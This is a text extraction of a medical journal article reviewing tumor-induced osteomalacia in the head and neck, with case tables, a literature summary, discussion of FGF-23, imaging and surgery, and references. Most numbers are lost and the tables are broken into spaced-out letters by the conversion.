via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com r shah et al. case series of head neck tio and review pb– : c as e n o. a u th or a ge /s ex lo ca ti on o f tu m or d u ra ti on o f sy m pt om s lo ca li zi n g im ag in g fg f- pe rs is te n ce / re cu rr en ce se co n d ar y m od al it y h pr p re -s u rg er y p o st -s u rg er y v ill ep el et ( ) f r ig h t et h m o id si n u s n a c t n a  p g/ m l (p o d - ) n o – p m t p el o ( ) f le ft t m j p e n a n a n o – p m t h e ( ) f r ig h t p ar o ti d g a- d o ta n o c n a n a n a – sa liv ar y b as al c el l ad en o m a w u ( ) f r ig h t m an d ib le n a n a n a p er si st en ce m u lt ip le s u rg er ie s o d o n to ge n ic fi b ro m a w u ( ) f le ft m ax ill a n a n a n a n o – o d o n to ge n ic fi b ro m a w u ( ) f r ig h t m ax ill a n a n a n a n o – pm t of m ix ed ep ith el ia l & co n n ec tiv e tis su e ty pe w u ( ) m le ft m an d ib le n a n a n a n o – p m t o f m ix ed ep it h el ia l & co n n ec ti ve t is su e ty p e w u ( ) m r ig h t m ax ill a n a n a n a n o – p m t o f m ix ed ep it h el ia l a n d co n n ec ti ve t is su e ty p e w u ( ) f r ig h t m an d ib le n a n a n a n o – pm t of m ix ed e pi th el ia l an d co n n ec tiv e tis su e ty pe w u ( ) m r ig h t m an d ib le n a n a n a n a – pm t of m ix ed e pi th el ia l an d co n n ec tiv e tis su e ty pe w u ( ) m le ft m ax ill a n a n a n a n o – pm t of m ix ed e pi th el ia l an d co n n ec tiv e tis su e ty pe w u ( ) m r ig h t m an d ib le n a n a n a n o – p m t o f m ix ed ep it h el ia l a n d co n n ec ti ve t is su e ty p e w u ( ) m r ig h t m ax ill a n a n a n a n o – pm t of m ix ed e pi th el ia l an d co n n ec tiv e tis su e ty pe w u ( ) m le ft m ax ill a n a n a n a n o – pm t of m ix ed e pi th el ia l an d co n n ec tiv e tis su e ty pe w u ( ) m r ig h t m ax ill a n a n a n a n o – pm t of m ix ed e pi th el ia l an d co n n ec tiv e tis su e ty pe w u ( ) m r ig h t m an d ib le n a n a n a n o – pm t of m ix ed e pi th el ia l an d co n n ec tiv e tis su e ty pe w u ( ) m r ig h t m an d ib le n a n a n a n o – pm t of m ix ed e pi th el ia l an d co n n ec tiv e tis su e ty pe w u ( ) m r ig h t m ax ill a n a n a n a n o – pm t of m ix ed e pi th el ia l an d co n n ec tiv e tis su e ty pe ta b le   c o n ti n u ed this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com r shah et al. case series of head neck tio and review : w u ( ) m le ft m an d ib le n a n a n a n o – pm t of m ix ed e pi th el ia l an d co n n ec tiv e tis su e ty pe w u ( ) m r ig h t m an d ib le n a n a n a n o – p m t o f m ix ed ep it h el ia l a n d co n n ec ti ve t is su e ty p e d in g ( ) f r ig h t n as al ca vi ty g a- d o ta ta te n a n a n a – n a d in g ( ) m r ig h t m an d ib le g a- d o ta ta te n a n a n a – n a m is h ra ( ) m r ig h t te m p o ra l lo b e m as s g a- d o ta n o c  r u /m l (n < ) n a n a – p m tm c t m is h ra ( ) f le ft s ku ll b as e tu m o r g a- d o ta n o c   r u /m l (n < )   r u /m l ( m o n th s p o st -s u rg er y) n o – p m tm c t li ( ) f le ft n as al c av it y h is to ry n a n a r ec u rr en ce r ep ea t su rg er y tw ic e h em an gi o p er ic yt o m a a ch ar ya ( ) m r ig h t m an d ib le fd g -p et   r u /m l (n < )  r u /m l (p o d ) n o – p m tm c t k u ri en ( ) f r ig h t n as al ca vi ty n a   r u /m l (n < )  r u /m l n o – p m tm c t k u ri en ( ) f le ft e th m o id si n u s n a n a   r u /m l n o – p m tm c t k u ri en ( ) m m id d le tu rb in at e n a   r u /m l (n < ) <  r u /m l n o – p m tm c t k u ri en ( ) m m id d le tu rb in at e n a   r u /m l (n < ) .  r u /m l n o – p m tm c t k u ri en ( ) m p o st er io r et h m o id , sp h en o id n a n a n a n o – p m tm c t k u ri en ( ) f a n te ri o r et h m o id w it h in tr ac ra n ia l ex te n si o n n a   r u /m l (n < )  r u /m l p er si st en ce r t m al ig n an t p m tm c t k u ri en ( ) f n as al c av it y, a ll p n s n a n a   r u /m l p er si st en ce o b se rv at io n p m tm c t p au l ( ) f le ft m an d ib le g a- d o ta ta te  r u /m l (n < )   r u /m l (p o d - )  r u /m l ( m o n th s p o st -s u rg er y) n o – p m tm c t p al ( ) m m an d ib le n a g a- d o ta ta te   r u /m l (n < )   r u /m l p er si st en t m ed ic al m an ag em en t h em an gi o p er ic yt o m a p al ( ) f r ig h t n as al ca vi ty n a g a- d o ta ta te   r u /m l (n < ) n a n o – a rt er io ve n o u s h em an gi o m a p al ( ) f le ft m ax ill ar y si n u s n a g a- d o ta ta te  r u /m l (n < ) n a n o – p m tm c t p al ( ) m le ft n as al c av it y n a g a- d o ta ta te   r u /m l (n < ) n a n o – h em an gi o p er ic yt o m a p al ( ) f le ft n as al c av it y n a fd g -p et  r u /m l (n < ) n a n o – h em an gi o p er ic yt o m a f, f em al e; m , m al e; n , n o rm al v al u e; n a , n o t av ai la b le ; o f, o ss ify in g fib ro m a lik e; p e, p h ys ic al e xa m in at io n ; p m tm c t, p h o sp h at u ri c m es en ch ym al t u m o r m ix ed c o n n ec ti ve t is su e ty p e; p o d , p o st -o p d ay ; p r r t, p ep ti d e re ce p to r ra d io n u cl id e th er ap y; r t, r ad ia ti o n t h er ap y; s v s, s el ec ti ve v en o u s sa m p lin g o f fg f- ; u d , u n d et ec ta b le . this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com r shah et al. case series of head neck tio and review pb– : table  summary of literature review. parameter value no. of patients with available data age (years) (mean ± s.d.)  ±  sex : location of tumor % (no.)  paranasal sinuses . ( )  mandible . ( )  intracranial . ( )  maxilla ( )  oral cavity . ( )  skull . ( )  parotid . ( )  posterior neck . ( )  cervical vertebra . ( )  infratemporal fossa . ( )  mastoid antrum . ( )  thyroid . ( ) local symptoms % (no.) . ( ) hypophosphatemic symptoms  muscle weakness % (no.) . ( )  fractures % (no.) . ( )  bone pains % (no.) ( )  bony deformities % (no.) . ( ) duration of symptoms (months), median (iqr) ( – ) biochemical profile  s. calcium (mg %) (mean ± s.d.) .  ±  .  s. phosphorus (mg %) (mean ± s.d.)   pre-op .  ±  .   post-op  ±  .  s. alkaline phosphatase (u/l) (median (iqr)) ( – )  tmp/gfr (median (iqr)) . ( . – . )  trp (median (iqr)) ( . – . )  pth (pg/ml) (median (iqr)) . ( . – . )   , (oh) vitamin d (pg/ml) (median (iqr)) ( . – . ) fgf- (pre-op) (median (iqr))  x uln . ( . – . )  c-terminal (ru/ml) ( – )  intact (pg/ml) ( – ) fgf- (post-op)  c-terminal (ru/ml) . ( . – )  intact (pg/ml) ( . – ) tumor size (cm) (median (iqr)) . ( . – . ) localization imaging % (no.)  history and pe . ( )  x-ray . ( )  ct scan . ( )  mri . ( )  octreotide scintigraphy . ( )  fdg-pet/ct . ( )  ga-dota-based pet/ct . ( )  selective venous sampling of fgf- . ( ) primary modality of treatment % (no.)  surgery . ( )  radiation therapy . ( )  combined surgery + radiation therapy . ( )  complete response to primary treatment % (no.) . ( )  persistent disease % (no.) . ( )  follow-up (months) ( . – )  recurrence % (no.) ( )  time to recurrence (months) (range) – (continued) this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com r shah et al. case series of head neck tio and review : complete surgical removal with wide margin of excision remains the cornerstone of management in these cases ( ). this is particularly difficult in intracranial tumors resulting in persistent disease as noted in both our patients with intracranial tumors. s. phosphorus and fgf- levels are used for post- operative surveillance. half-life of fgf- is very short and one can document it immediately post-operatively ( ). persistent elevation of fgf- was noted post-operatively in two patients (cases and ), which normalized on re-evaluation after months. this observation has been previously reported particularly with c-terminal fgf- assay ( , ). phosphate supplements are discontinued post-operatively to allow for surveillance. reimaging is performed in patients with persistent symptoms and biochemically active disease. in recurrent or persistent cases, complete tumor removal resulted in cure in two patients, hence, this remains the preferred approach at our institute. in inoperable cases, two patients received external beam radiotherapy (ebrt) and one patient received peptide receptor radiotherapy (prrt). in one patient (case ) ebrt was given after first surgery due to difficult tumor location at petrous apex. he had a gradual and complete response to rt over next years. in another scenario (case ), the patient had persistent disease after functional endoscopic sinus surgery (fess) for left ethmoid sinus tumor. following two repeat fess, patient was considered for ebrt for persistent disease. patient received imrt gy in fractions. s. phosphorus and fgf- normalized gradually over one and half years and this patient who was previously bedbound is now walking without any support. one patient (case ) in our cohort has received prrt for persistent disease after two surgeries for base of skull tumor ( ). as tumor was ga-dotatate avid having parameter value no. of patients with available data site wise persistence/recurrence % (no./no.)  paranasal sinuses . ( / )  mandible . ( / )  intracranial . ( / )  maxilla . ( / )  oral cavity . ( / )  thyroid ( ) secondary modality of treatment % (no.)  surgery . ( )  rt . ( )  chemotherapy . ( )  cinacalcet . ( )  octreotide . ( )  radiofrequency ablation . ( )  prrt . ( )  others . ( )  metastasis % (no.) . ( ) histopathology % (no.)  pmtmct . ( )  pmt ossifying fibroma like . ( )  pmt mixed epithelial and connective tissue type . ( )  malignant pmtmct . ( )  hemangiopericytoma . ( )  giant cell tumor . ( )  odontogenic fibroma . ( )  glomangiopericytoma . ( )  malignant schwannoma . ( )  meningioma . ( )  salivary basal cell adenoma . ( )  ameloblastic fibrosarcoma . ( )  primitive mesenchymal tumor . ( )  arteriovenous hemangioma . ( )  spindle cell tumor with pmt features . ( )  cellular non-descript . ( )  chronic inflammatory tissue with fibrosis and epithelial cell rests . ( ) table  continued this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com r shah et al. case series of head neck tio and review pb– : krenning score iv, patient was considered for prrt after a thorough discussion in a multidisciplinary meeting. this patient has stable disease after two cycles of prrt with – uci lu-dotatate. pmtmct remains the commonest histopathologic entity in these patients. we also reported one patient for each of the following: pmt-of like, odontogenic fibroma and hemangiopericytoma in our cohort. detailed histopathological findings for cases three, four and six have been published previously ( ). although the sample size of cohort was small, the epidemiological data are similar to cohort . there is an increased prevalence of local symptoms at presentation and higher rate of persistence following primary surgery at our center. this could be attributed to referral bias to a tertiary care center. cohort here we present a detailed review of published english literature for tio cases involving head and neck region (n = ) ( , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ). this is the largest series of its kind published to date. epidemiology as is the case with overall tio literature, almost equal male:female ratio is reported in head and neck tio patients ( ). middle age is the most common age at presentation and three pediatric cases are reported so far. tio is a difficult diagnosis in pediatric patients as heritable hypophosphatemic rickets is a more likely diagnosis unless the tumor is evident. fernández-cooke et al. have reported a -year-old child with rickets and a jaw tumor. two years went by before a link was established between the two and a diagnosis of tio was made ( ). in the case described by reyes-mugica et al. the heightened awareness of pediatric endocrinologist for this condition led to early screening with imaging and subsequent surgical removal resulting in cure within weeks of onset of symptoms ( ). in the third case reported by wu et al. also the duration of hypophosphatemic symptoms was years ( ). the time from symptom onset to final diagnosis remains dreadfully long. in this series of cases of tio involving head and neck region, only % (n = ) were diagnosed in the first year of disease onset with majority of them having local symptoms at presentation. feng et  al. observed a misdiagnosis rate of . % with case-times of misdiagnoses among cases of tio even in the presence of evident hypophosphatemia in . % cases ( ). reasons cited for misdiagnosis were disease rarity, insidious onset, nonspecific clinical manifestations and poor recognition by the clinician. presence of local compressive symptoms and/or swelling in approximately % patients in this review highlights the problem of delayed or missed diagnosis as musculoskeletal symptoms are ignored until presentation with advanced local symptoms. biochemical profile the typical biochemical profile in tio is straightforward: hypophosphatemia with normocalcemia, moderately elevated alp, normal pth, inappropriately normal-to- high urinary phosphate excretion, low serum , (oh) vitamin d and elevated fgf- levels ( ). fgf- is useful as a tumor marker. based on two case reports, half-life of fgf- is between – min ( , ). more recently, hana et al. reported half-life of fgf- to be . min in a patient with intracranial pmtmct using intact fgf- assay ( ). this allows fgf- to be used for intraoperative monitoring to determine the extent of tumor removal. immediate post-op decline in fgf- levels within normal range is reported by other investigators ( , , , ) as well. elston et al. reported discordant increase in c-terminal fgf- post-op which has not been confirmed by other studies ( ). as previously stated, persistent elevation in c-terminal fgf- in immediate post-operative period has been documented despite complete tumor removal ( , ). with no reports on levels of other postulated phosphotonins like matrix extracellular phosphoglycoprotein (mepe) and secreted frizzled-related protein (sfrp ) in patients with tio, their role still remains unclear ( ). location of tumor most common site for tio in head and neck region is paranasal sinuses. among them, ethmoid sinuses are the most common site followed by maxillary, sphenoid and frontal sinuses. most common tumors are pmtmct, hemangiopericytoma and glomangiopericytoma, in descending order. the second most common site is bony tumors arising from the mandible and maxilla with this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com r shah et al. case series of head neck tio and review : odontogenic fibroma and, pmt of mixed connective tissue and epithelial components as special tumor types. third position is for intracranial tumors involving anterior cranial fossa, middle cranial fossa, and posterior cranial fossa, in descending order of prevalence. reported tumors include pmtmct, hemangiopericytoma and meningioma. tumors of oral cavity include gingival tumors (molar/premolar), tongue and buccal vestibule in that order of occurrence. apart from pmtmct (including malignant) and hemangiopericytoma, tumors from this region also include giant cell tumor and ossifying fibroma. rarely tumors have been reported from skull, parotid glands, posterior neck, infratemporal fossa, mastoid antrum, thyroid and vertebra. localization imaging classically, history of local compressive symptoms and/or visible mass on physical examination is instrumental in diagnosing tio even in this current era of sensitive imaging modalities. earlier clinicians were dependent on physical examination and x-rays for diagnosing tio. renton et  al., nitzan et  al., and nomura et  al. have localized head and neck tio through x-rays alone ( , , ). with the introduction of ct scans ( – ), % tumors in the head and neck region were localized with this modality. the first localization of head and neck tio on mri was reported by avila et  al. in using mr skeletal survey ( ). following in vitro demonstration of somatostatin receptors (sstrs) by reubi et al. ( ), scintigraphic studies using in-pentetreotide for tumor localization was published by de beur et  al. in ( ). subsequently, localization with mtc-mibi and fdg-pet scans was reported ( , ). use of fdg-pet was limited due to poor specificity of non-receptor-based imaging, and slow-growing nature of these tumors resulting in false- negative results ( ). with improved spatial resolution, lower radiation dose and more rapid whole-body tomographic imaging of pet/ct studies in comparison to scintigraphy, ga-dota-based pet/ct scans became the investigation modality of choice in tio patients ( , ). various studies have shown superiority of ga-dotatate pet/ct and ga-dotanoc pet/ct over fdg-pet/ct and octreoscan for tumor localization in tio ( , , ). the largest such study is that of patients by zhang et al. using ga-dotatate pet/ct reported % sensitivity and . % specificity in lesion detection ( ). use of positron emitter radiotracer ga enabling pet-based imaging along with higher affinity sstr ligands like dotatate (sstr > ) and dotanoc (sstr , , ) are postulated to be responsible for enhanced sensitivity of ga-dota-based pet/ct over octreoscan ( ). thereafter, singh et  al. highlighted the issue of multiple low-grade benign uptakes using ga-dotanoc pet/ct especially at fracture sites and described the use of suvmax and anatomical imaging showing soft tissue component in the lesion to pinpoint the causal lesion ( ). in summary, ga-dota-based pet/ct is superior to other functional studies like fdg-pet and octreoscan, but its utilization will depend on local availability and expertise ( ). selective venous sampling of fgf- has been studied for accurate localization of tio. kobayashi et  al. used selective venous sampling as an initial guiding modality localizing the tumor to right head and neck region, although on retrospect distortion of right external ear canal was noted and no prior functional imaging was done to localize the tumor ( ). andreopoulou et  al. reported sensitivity of % and specificity of % at fgf- concentration ratio of . between the venous drainage of the tumor bed and general circulation after sampling major veins and their branches ( ). they concluded that selective venous sampling is not useful in the absence of suspicious lesion on imaging studies and its use should be limited to cases with multiple suspicious sites or before resection in anatomically challenging cases. in , lee et  al. reported contrasting results. in their cohort, five patients negative on both indium- octreotide scintigraphy and fdg-pet/ct were subjected to selective blood sampling from to sites ( ). they identified the culprit lesion on follow-up with targeted mri or whole-body ga-dotatoc in four patients. tarasova et  al. and shober et  al. have used selective venous fgf- sampling to confirm the sstr expressing meningioma to be the fgf- secreting culprit lesion as many meningiomas are avid on sstr-based imaging but may not be the source of fgf- ( ). in summary, in the current era of sstr-based imaging, the role of this modality seems to be limited to cases with multiple suspicious uptake sites, intracranial lesions consistent with meningioma, and lastly in imaging negative cases to identify a target for focused follow-up imaging. treatment primary modality complete surgical resection with adequate wide margin remains the treatment of choice in these tumors ( ). this is supported in head and neck tio cases where anatomical this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com r shah et al. case series of head neck tio and review pb– : sites less amenable for this approach have higher persistence or recurrence rate for example intracranial tumors. hana et  al. also reiterated this principle in their report on recurrent anterior skull base tumor with enbloc tumor removal followed by filling of the large skull base defect with pedicle subgaleal flap resulting in absence of recurrence over -month follow-up ( ). stereotactic radiotherapy has been described in two cases as primary modality. both patients had frontal lobe tumors and both refused surgery. one patient had lower plasma fgf- and oral phosphorous requirement at -month follow-up. the details of rt are not described in this case report ( ). the second patient received gy of fractionated stereotactic radiotherapy over weeks ( ). on follow-up, patient was off phosphorus supplement and had normal fgf- concentration after years. the tumor was stable with areas of multiple small hemorrhages. bmd improved by approximately % with no evident new fracture. as the tumors are slow growing, radiotherapy is deemed to be less effective ( ). surgery combined with adjuvant post-op radiotherapy was used by john et  al. in a case of invasive ‘malignant schwannoma’ ( ). over . years of follow-up, serum phosphorus normalized but , (oh) vitamin d was persistently low. mri showed no evidence of residual/recurrent tumor. similarly, lee et  al. described a case where the patient received post-operative radiotherapy following incomplete removal of an ethmoid tumor, which resulted in normal serum phosphorus with no residual tumor on mri after completion of rt ( ). in summary, although complete surgical excision remains the treatment modality of choice, in rare cases radiation therapy can be used with an expectant slow response. persistent/recurrent disease persistent/recurrent disease signifies failure of complete resection of the tumor after primary excision. this occurs more commonly in intracranial disease and oral cavity lesions where enbloc tumor removal is challenging and leads to higher surgical morbidity and complications. serial biochemical follow-up is essential as true recurrences after complete biochemical resolution are known, but usually it is the recurrence of symptoms which brings the disease to surface. after anatomic imaging to confirm the site of tumor recurrence, re-exploration of the surgical site along with attempted enbloc removal remains the preferred approach. out of eleven patients with persistent/recurrent disease who have aned on follow-up, eight have been treated with re-surgery alone. in persistent cases multiple re-surgeries, radiotherapy, cinacalcet and octeotride have been used with limited success. seufert et al. reported a patient with left thigh tio localized on octreotide scinitigraphy having complete resolution of phosphaturia and normalization of serum phosphorus with – µg of octreotide thrice a day in preoperative setting ( ). however, this initial success has not been replicated in subsequent studies ( , ). extrapolating from patients with hypoparathyroidism with elevated fgf- and serum phosphorus levels, gellers et  al. advocated for the use of cinacalcet in the treatment of tio ( ). but development of hypercalciuria and hypocalcemia limits the use of cinacalcet in this cohort. disease stability with dasatinib has been reported ( ). as these tumors also express sstr, prrt remains a potentially useful option in tumors showing krenning iii/iv uptake on ga-dotatate pet/ct ( ). it has been more than a decade of successful utilization of two radiopeptides y-dotatoc and lu-dotatate for treatment of advanced neuroendocrine tumors (nets) ( ). after binding to sstr these peptides are internalized in tumor cells and the released breakdown products in lysosomes mediate radioactivity-induced local damage ( ). apart from our case, we could not find any other experience with prrt in tio literature. in patients with persistent disease, treatment with oral phosphate supplements and calcitriol is continued for symptomatic improvement. metastases four cases of malignant tio in head and neck region are reported so far. three of them originated from oral cavity and one from mandible. uramoto et  al. described a case of malignant pmtmct involving tongue with lymph node metastases treated with two surgeries followed by radiation therapy with persistent disease on last follow-up ( ). bergwitz et  al. reported a patient with ameloblastic fibrosarcoma of mandible with pulmonary and lymph node metastases ( ). patient had multiple recurrences and was managed with repeated surgeries, and lastly cinacalcet with persistent hypophosphatemia. fatani et al. reported an interesting case of malignant pmtmct arising from oral cavity who after years of follow-up developed lung metastases which were resected in addition to multiple surgeries for primary disease ( ). patient was normophosphatemic on follow-up. the fourth case of malignant pmtmct was reported by wasserman et al. ( ). this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com r shah et al. case series of head neck tio and review : the tumor involved nose, lip and mouth. no further follow-up/management details have been reported. histopathology weidner et  al. initially proposed the term phosphaturic mesenchymal tumors (pmt) and their classification into four distinct subtypes: (i) mixed connective tissue variant (mct), (ii) osteoblastoma like, (iii) non-ossifying fibroma type, (iv) ossifying fibroma like ( ). in , folpe et  al. reviewed all previously published cases and found that they all belong to pmtmct category ( ). in this review we have reported the revised diagnosis as mentioned by folpe et  al. in , wu et  al. described a new entity called “pmt mixed epithelial and connective tissue type” which is found exclusively in alveolar bone of maxilla and mandible ( ). they found this tumor to be common in males and in patients < years of age. they have proposed a revised diagnosis of previously published six cases to this new entity, but we have reported them according to the original report. apart from pmts, other reported tumors in head and neck region causing tio include meningioma, salivary basal cell adenoma, malignant schwannoma, ameloblastic fibrosarcoma, and spindle cell tumor with pmt features. study limitations to our knowledge this is the largest review of tio due to tumors located in head and neck region till date. the per- patient analysis method used in this study with minute detailing of all clinically relevant published aspects is the major strength of this study. there are several limitations in this study. as the review is a retrospective analysis of published case reports, all the limitations pertaining to retrospective studies apply to it. additionally, many case reports lacked important clinical details as majority of them focused on pathology or imaging. a meticulous attempt was made to include all published literature regarding the subject but a few studies may not have been included. summary tio in the head and neck region is a rare disorder that warrants management by a multidisciplinary team including an endocrinologist, head and neck surgeon, radiologist, nuclear physicist and pathologist. low phosphorus with elevated fgf- levels in a patient with clinical features of osteomalacia and/or mass in the head and neck region should be evaluated with ga-dota- based pet/ct imaging. an alternative approach would be anatomical imaging followed by biopsy in a patient with local symptoms and clinically apparent swelling. complete surgical excision with wide margin is of utmost importance in these cases resulting in dramatic clinical and biochemical normalcy. clinical and biochemical follow-up is necessary even after documented cure as true recurrences have been reported. whenever complete excision is not achieved, repeat surgical excision is recommended for accessible disease burden. in inoperable cases, radiotherapy, prrt and medical management are suitable alternatives which should be decided by a multidisciplinary team on an individual basis. although the tumor remains benign in most cases, one must remain vigilant in case of long-standing disease due to the reported risk of metastasis. histopathological examination in most cases reveals pmtmct, but other types are also seen. declaration of interest the authors declare that there is no conflict of interest that could be perceived as prejudicing the impartiality of the research reported. funding this research has been supported by department of endocrinology, seth gs medical college & kem hospital, mumbai, india and diamond jubilee society trust (djst), kem hospital, mumbai, india. references drezner mk. tumor-induced osteomalacia. in primer on metabolic bone diseases and disorders of mineral metabolism, th ed., ch , pp – . ed. mj favus. philadelphia, pa, usa: lippincott-raven, . mccance r. osteomalacia with loosers nodes (milkman’s syndrome) due a raised resistance to vitamin d acquired about the age of years. quarterly journal of medicine – . chong wh, molinolo aa, chen cc & collins mt. tumor-induced osteomalacia. endocrine-related cancer r –r . (https://doi. org/ . /erc- - ) jiang y, xia wb, xing xp, silva bc, li m, wang o, zhang hb, li f, jing hl, zhong dr, et al. tumor‐induced osteomalacia: an important cause of adult‐onset hypophosphatemic osteomalacia in china: report of cases and review of the literature. journal of bone and mineral research – . (https://doi.org/ . / jbmr. ) renton p & shaw dg. hypophosphatemic osteomalacia secondary to vascular tumous of bone and soft tissue. skeletal radiology – . (https://doi.org/ . /bf ) sweet ra, males jl, hamstra aj & deluca hf. vitamin d metabolite levels in oncogenic osteomalacia. annals of internal medicine – . (https://doi.org/ . / - - - - ) nitzan dw, marmary y & azaz b. mandibular tumor-induced muscular weakness and osteomalacia. oral surgery, oral medicine, and oral pathology – . (https://doi.org/ . / - ( ) - ) this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://doi.org/ . /erc- - https://doi.org/ . /erc- - https://doi.org/ . /jbmr. https://doi.org/ . /jbmr. https://doi.org/ . /bf https://doi.org/ . / - - - - https://doi.org/ . / - ( ) - https://doi.org/ . / - ( ) - https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com r shah et al. case series of head neck tio and review pb– : nomura g, koshino y, morimoto h, kida h, nomura s & tamai k. vitamin d resistant hypophosphatemic osteomalacia associated with osteosarcoma of the mandible: report of a case. japanese journal of medicine – . (https://doi.org/ . / internalmedicine . . ) linsey m, smith w, yamauchi h & bernstein l. nasopharyngeal angiofibroma presenting as adult osteomalacia: case report and review of the literature. laryngoscope – . (https:// doi.org/ . /lary. . . . ) folpe al, fanburg-smith jc, billings sd, bisceglia m, bertoni f, cho jy, econs mj, inwards cy, jan de beur sm, mentzel t, et al. most osteomalacia-associated mesenchymal tumors are a single histopathologic entity: an analysis of cases and a comprehensive review of the literature. american journal of surgical pathology – . (https://doi.org/ . / - - ) seshadri ms, cornish cj, mason rs & posen s. parathyroid hormone like bioactivity in tumours from patients with oncogenic osteomalacia. clinical endocrinology – . (https://doi. org/ . /j. - . .tb .x) jefferis af, taylor pca & walsh-waring gp. tumour associated hypophosphatemic osteomalacia occurring in a patient with an odontogenic tumour of the maxilla. journal of laryngology and otology – . (https://doi.org/ . /s ) weidner n, bar rs, weiss d & strottmann mp. neoplastic pathology of oncogenic osteomalacia/rickets. cancer – . (https://doi.org/ . / - ( ) : < ::aid- cncr > . .co; -s) lee hk, sung ww, solodnik p & shimshi m. bone scan in tumour- induced osteomalacia. journal of nuclear medicine – . catalano pj, brandwein m, shah dk, urken ml, lawson w & biller hf. sinonasal hemangiopericytomas: a clinicopathologic and immunohistochemical study of seven cases. head and neck – . (https://doi.org/ . /(sici) - ( / ) : < ::aid-hed > . .co; -z) wilkins ge, granleese s, hegele rg, holden j, anderson dw & bondy gp. oncogenic osteomalacia: evidence for a humoral phosphaturic factor. journal of clinical endocrinology and metabolism – . (https://doi.org/ . /jcem. . . ) david k, revesz t, kratimenos g, krausz t & crockard ha. oncogenic osteomalacia associated with a meningeal phosphaturic mesenchymal tumour. journal of neurologicalsurgery – . kim yg, choi ys, lee sc & ryu dm. tumour-induced osteomalacia associated with lesions in the oral and maxillofacial region: report of two cases. journal of oral and maxillofacial surgery – . (https://doi.org/ . /s - ( ) - ) avila na, skarulis m, rubino dm & doppman jl. oncogenic osteomalacia: lesion detection by mr skeletal survey. american journal of roentgenology – . (https://doi.org/ . / ajr. . . ) yang im, park yk, hyun yj, kim dy, woo jt, kim sw, kim jw, kim ys & choi yk. oncogenic osteomalacia caused by a phosphaturic mesenchymal tumour of the oral cavity: a case report. korean journal of internal medicine – . (https://doi. org/ . /kjim. . . . ) gonzalez-compta x, manos-pujol m, foglia-fernandez m, peral e, condom e, claveguera t & dicenta-sousa m. oncogenic osteomalacia: case report and review of head and neck associated tumours. journal of laryngology and otology – . (https://doi.org/ . /s ) ohashi k, ohnishi t, ishikawa t, tani h, uesugi k & takagi m. oncogenic osteomalacia presenting as bilateral stress fractures of the tibia. skeletal radiology – . (https://doi.org/ . / s ) clunie gpr, fox pe & stamp tcb. four cases of acquired hypophosphatemic (oncogenic) osteomalacia. problems of diagnosis, treatment and long-term management. rheumatology – . (https://doi.org/ . / rheumatology/ . . ) sandhu fa & martuza rl. craniofacial hemangiopericytoma associated with oncogenic osteomalacia: case report. journal of neuro-oncology – . (https://doi. org/ . /a: ) reyes-mugica m, arnsmeier sl, backeljauw pf, persing j, ellis b & carpenter to. phosphaturic mesenchymal tumour-induced rickets. pediatric and developmental pathology – . (https://doi. org/ . /s ) kawai y, morimoto s, sakaguchi k, yoshino h, yotsui t, hirota s, inohara h, nakagawa t, hattori k, kubo t, et al. oncogenic osteomalacia secondary to nasal tumour with decreased urinary excretion of camp. journal of bone and mineral metabolism – . (https://doi.org/ . /s ) john mr, wickert h, zaar k, jonsson kb, grauer a, ruppersberger p, schmidt-gayk h, murer h, ziegler r & blind e. a case of neuroendocrine oncogenic osteomalacia associated with a phex and fibroblast growth factor- expressing sinusoidal malignant schwannoma. bone – . (https://doi.org/ . / s - ( ) - ) reis-filho js, paiva me & lopes jm. august : -year-old female with a -year history of osteomalacia and hypophosphatemia. brain pathology – , . (https://doi. org/ . /j. - . .tb .x) fuentealba c, pinto d, ballesteros f, pacheco d, boettiger o, soto n, fernandez w, gabler f, gonzales g & reginato aj. oncogenic hypophosphatemic osteomalacia associated with a nasal hemangiopericytoma. journal of clinical rheumatology – . (https://doi.org/ . / .rhu. . .ed) ungari c, rocchi g, rinna c, agrillo a, lattanzi a & pagnoni m. hypophosphaturic mesenchymal 